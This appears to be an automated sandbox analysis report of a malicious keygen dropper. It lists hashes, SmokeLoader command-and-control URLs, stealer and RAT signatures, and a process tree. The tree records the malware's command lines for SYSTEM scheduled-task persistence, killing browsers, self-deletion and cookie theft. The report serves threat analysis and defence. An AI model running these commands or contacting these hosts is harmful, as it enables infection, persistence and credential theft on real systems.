Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    294s
  • max time network
    1779s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    06-05-2021 06:58

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 46 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 28 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 48 IoCs
  • Modifies data under HKEY_USERS 33 IoCs
  • Modifies registry class 40 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 38 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Drops file in System32 directory
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:856
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {3B1C5727-F061-4CC9-8AF3-DA1A0C603906} S-1-5-18:NT AUTHORITY\System:Service:
      2⤵
        PID:2052
        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
          3⤵
          • Executes dropped EXE
          PID:2460
        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
          3⤵
          • Executes dropped EXE
          PID:2280
        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
          3⤵
          • Executes dropped EXE
          PID:4144
        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
          3⤵
          • Executes dropped EXE
          PID:4192
        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
          3⤵
          • Executes dropped EXE
          PID:4532
        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
          3⤵
          • Executes dropped EXE
          PID:5904
        • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
          "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
          3⤵
          • Drops file in Program Files directory
          PID:2008
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {46A4363D-F4E9-460B-AC24-5971E3AC1EB9} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
        2⤵
          PID:7924
          • C:\Users\Admin\AppData\Roaming\cafwhcf
            C:\Users\Admin\AppData\Roaming\cafwhcf
            3⤵
              PID:7632
              • C:\Users\Admin\AppData\Roaming\cafwhcf
                C:\Users\Admin\AppData\Roaming\cafwhcf
                4⤵
                  PID:7796
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {5F1DFB91-6A25-4C62-AA27-7AE38027C77C} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
              2⤵
                PID:1396
                • C:\Users\Admin\AppData\Roaming\cafwhcf
                  C:\Users\Admin\AppData\Roaming\cafwhcf
                  3⤵
                    PID:1100
                    • C:\Users\Admin\AppData\Roaming\cafwhcf
                      C:\Users\Admin\AppData\Roaming\cafwhcf
                      4⤵
                        PID:4204
                  • C:\Windows\system32\taskeng.exe
                    taskeng.exe {CE73D109-4335-4F07-9FA8-99BCB9D1D064} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
                    2⤵
                      PID:6688
                      • C:\Users\Admin\AppData\Roaming\cafwhcf
                        C:\Users\Admin\AppData\Roaming\cafwhcf
                        3⤵
                          PID:6760
                          • C:\Users\Admin\AppData\Roaming\cafwhcf
                            C:\Users\Admin\AppData\Roaming\cafwhcf
                            4⤵
                              PID:6784
                      • C:\Windows\system32\services.exe
                        C:\Windows\system32\services.exe
                        1⤵
                          PID:468
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                            2⤵
                            • Checks processor information in registry
                            • Modifies data under HKEY_USERS
                            • Modifies registry class
                            PID:1192
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                            2⤵
                            • Drops file in System32 directory
                            • Checks processor information in registry
                            • Modifies data under HKEY_USERS
                            • Modifies registry class
                            PID:1928
                          • C:\Windows\system32\msiexec.exe
                            C:\Windows\system32\msiexec.exe /V
                            2⤵
                            • Enumerates connected drives
                            • Drops file in Windows directory
                            • Modifies data under HKEY_USERS
                            • Modifies registry class
                            PID:2620
                            • C:\Windows\syswow64\MsiExec.exe
                              C:\Windows\syswow64\MsiExec.exe -Embedding E927335F1BD4DD2227055C31B23C38F1 C
                              3⤵
                              • Loads dropped DLL
                              PID:2832
                            • C:\Windows\syswow64\MsiExec.exe
                              C:\Windows\syswow64\MsiExec.exe -Embedding D0A45E63007634DB17F8B7A0DCA80FD2
                              3⤵
                              • Blocklisted process makes network request
                              • Loads dropped DLL
                              PID:2936
                              • C:\Windows\SysWOW64\taskkill.exe
                                "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                4⤵
                                • Kills process with taskkill
                                PID:2284
                            • C:\Windows\syswow64\MsiExec.exe
                              C:\Windows\syswow64\MsiExec.exe -Embedding DCC2A79F51812443D747155EA4544981 M Global\MSI0000
                              3⤵
                                PID:1728
                          • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                            "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                            1⤵
                            • Loads dropped DLL
                            • Checks whether UAC is enabled
                            • Suspicious use of WriteProcessMemory
                            PID:1096
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              • Suspicious use of WriteProcessMemory
                              PID:1980
                              • C:\Windows\SysWOW64\rundll32.exe
                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                3⤵
                                • Loads dropped DLL
                                • Modifies registry class
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:1772
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1800
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:1712
                              • C:\Users\Admin\AppData\Local\Temp\is-PT2A4.tmp\Install.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-PT2A4.tmp\Install.tmp" /SL5="$30182,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of WriteProcessMemory
                                PID:1888
                                • C:\Users\Admin\AppData\Local\Temp\is-KQ2GS.tmp\Ultra.exe
                                  "C:\Users\Admin\AppData\Local\Temp\is-KQ2GS.tmp\Ultra.exe" /S /UID=burnerch1
                                  4⤵
                                  • Drops file in Drivers directory
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  • Suspicious use of WriteProcessMemory
                                  PID:1728
                                  • C:\Program Files\Windows Defender\ROPRWXHFHR\ultramediaburner.exe
                                    "C:\Program Files\Windows Defender\ROPRWXHFHR\ultramediaburner.exe" /VERYSILENT
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of WriteProcessMemory
                                    PID:1328
                                    • C:\Users\Admin\AppData\Local\Temp\is-3U7OR.tmp\ultramediaburner.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-3U7OR.tmp\ultramediaburner.tmp" /SL5="$10192,281924,62464,C:\Program Files\Windows Defender\ROPRWXHFHR\ultramediaburner.exe" /VERYSILENT
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Drops file in Program Files directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of WriteProcessMemory
                                      PID:1616
                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                        7⤵
                                        • Executes dropped EXE
                                        PID:1292
                                  • C:\Users\Admin\AppData\Local\Temp\7a-60e80-b88-007b7-a355c2a516f6a\Rotygoshaelae.exe
                                    "C:\Users\Admin\AppData\Local\Temp\7a-60e80-b88-007b7-a355c2a516f6a\Rotygoshaelae.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:1972
                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                      6⤵
                                      • Modifies Internet Explorer settings
                                      • Suspicious behavior: GetForegroundWindowSpam
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1788
                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:275457 /prefetch:2
                                        7⤵
                                        • Modifies Internet Explorer settings
                                        • Suspicious use of SetWindowsHookEx
                                        PID:1784
                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:275470 /prefetch:2
                                        7⤵
                                        • Modifies Internet Explorer settings
                                        • NTFS ADS
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2448
                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:340994 /prefetch:2
                                        7⤵
                                        • Modifies Internet Explorer settings
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2532
                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:734215 /prefetch:2
                                        7⤵
                                        • Modifies Internet Explorer settings
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2520
                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:3421197 /prefetch:2
                                        7⤵
                                        • Executes dropped EXE
                                        • Modifies Internet Explorer settings
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2548
                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:3290129 /prefetch:2
                                        7⤵
                                        • Modifies Internet Explorer settings
                                        • Suspicious use of SetWindowsHookEx
                                        PID:972
                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:3224597 /prefetch:2
                                        7⤵
                                          PID:2880
                                      • C:\Program Files\Internet Explorer\iexplore.exe
                                        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                        6⤵
                                          PID:1832
                                      • C:\Users\Admin\AppData\Local\Temp\00-66988-68a-9d084-e405e718c6525\Sewopejuzhu.exe
                                        "C:\Users\Admin\AppData\Local\Temp\00-66988-68a-9d084-e405e718c6525\Sewopejuzhu.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:952
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pbwqug5r.nm3\KiffMainE1.exe & exit
                                          6⤵
                                            PID:3048
                                            • C:\Users\Admin\AppData\Local\Temp\pbwqug5r.nm3\KiffMainE1.exe
                                              C:\Users\Admin\AppData\Local\Temp\pbwqug5r.nm3\KiffMainE1.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:2016
                                              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                dw20.exe -x -s 532
                                                8⤵
                                                • Suspicious behavior: GetForegroundWindowSpam
                                                PID:2436
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\trtzsunw.bkt\001.exe & exit
                                            6⤵
                                              PID:2456
                                              • C:\Users\Admin\AppData\Local\Temp\trtzsunw.bkt\001.exe
                                                C:\Users\Admin\AppData\Local\Temp\trtzsunw.bkt\001.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:2544
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bugp3cod.nkr\installer.exe /qn CAMPAIGN="654" & exit
                                              6⤵
                                                PID:2972
                                                • C:\Users\Admin\AppData\Local\Temp\bugp3cod.nkr\installer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\bugp3cod.nkr\installer.exe /qn CAMPAIGN="654"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Enumerates connected drives
                                                  • Modifies system certificate store
                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:1800
                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\bugp3cod.nkr\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\bugp3cod.nkr\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620025268 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                    8⤵
                                                      PID:3032
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1rczqtyo.hsl\google-game.exe & exit
                                                  6⤵
                                                    PID:2540
                                                    • C:\Users\Admin\AppData\Local\Temp\1rczqtyo.hsl\google-game.exe
                                                      C:\Users\Admin\AppData\Local\Temp\1rczqtyo.hsl\google-game.exe
                                                      7⤵
                                                        PID:2548
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                          8⤵
                                                          • Loads dropped DLL
                                                          • Modifies registry class
                                                          PID:1680
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r1dfswhz.0qy\huesaa.exe & exit
                                                      6⤵
                                                        PID:2132
                                                        • C:\Users\Admin\AppData\Local\Temp\r1dfswhz.0qy\huesaa.exe
                                                          C:\Users\Admin\AppData\Local\Temp\r1dfswhz.0qy\huesaa.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          PID:1636
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:2524
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:2412
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                              PID:8148
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                                PID:1504
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dtz2g1va.xh2\askinstall39.exe & exit
                                                            6⤵
                                                              PID:2572
                                                              • C:\Users\Admin\AppData\Local\Temp\dtz2g1va.xh2\askinstall39.exe
                                                                C:\Users\Admin\AppData\Local\Temp\dtz2g1va.xh2\askinstall39.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                PID:1592
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                  8⤵
                                                                    PID:3020
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im chrome.exe
                                                                      9⤵
                                                                      • Kills process with taskkill
                                                                      PID:2032
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fwj03u1g.xgl\setup.exe & exit
                                                                6⤵
                                                                  PID:2380
                                                                  • C:\Users\Admin\AppData\Local\Temp\fwj03u1g.xgl\setup.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\fwj03u1g.xgl\setup.exe
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                    PID:2428
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\fwj03u1g.xgl\setup.exe"
                                                                      8⤵
                                                                        PID:2724
                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                          ping 1.1.1.1 -n 1 -w 3000
                                                                          9⤵
                                                                          • Runs ping.exe
                                                                          PID:2808
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jw2251y1.bse\Setup_v3.exe & exit
                                                                    6⤵
                                                                      PID:1556
                                                                      • C:\Users\Admin\AppData\Local\Temp\jw2251y1.bse\Setup_v3.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jw2251y1.bse\Setup_v3.exe
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                        PID:2668
                                                                        • C:\Windows\SysWOW64\at.exe
                                                                          "C:\Windows\System32\at.exe"
                                                                          8⤵
                                                                            PID:2928
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                            8⤵
                                                                              PID:2372
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\System32\cmd.exe
                                                                                9⤵
                                                                                  PID:2252
                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                    findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                                    10⤵
                                                                                      PID:2612
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                                      Fessura.exe.com Z
                                                                                      10⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2956
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                                        11⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:2512
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                                          12⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:2952
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                          12⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2444
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping 127.0.0.1 -n 30
                                                                                      10⤵
                                                                                      • Runs ping.exe
                                                                                      PID:2864
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                                  8⤵
                                                                                    PID:2780
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qjty51fe.hqf\toolspab1.exe & exit
                                                                                6⤵
                                                                                  PID:2680
                                                                                  • C:\Users\Admin\AppData\Local\Temp\qjty51fe.hqf\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\qjty51fe.hqf\toolspab1.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                    PID:1968
                                                                                    • C:\Users\Admin\AppData\Local\Temp\qjty51fe.hqf\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\qjty51fe.hqf\toolspab1.exe
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:888
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgjjlrte.24l\005.exe & exit
                                                                                  6⤵
                                                                                    PID:2900
                                                                                    • C:\Users\Admin\AppData\Local\Temp\pgjjlrte.24l\005.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\pgjjlrte.24l\005.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                      PID:2004
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zquhyajp.ffs\SunLabsPlayer.exe /S & exit
                                                                                    6⤵
                                                                                      PID:1480
                                                                                      • C:\Users\Admin\AppData\Local\Temp\zquhyajp.ffs\SunLabsPlayer.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\zquhyajp.ffs\SunLabsPlayer.exe /S
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in Program Files directory
                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                        PID:1692
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:1536
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstEA3.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:2812
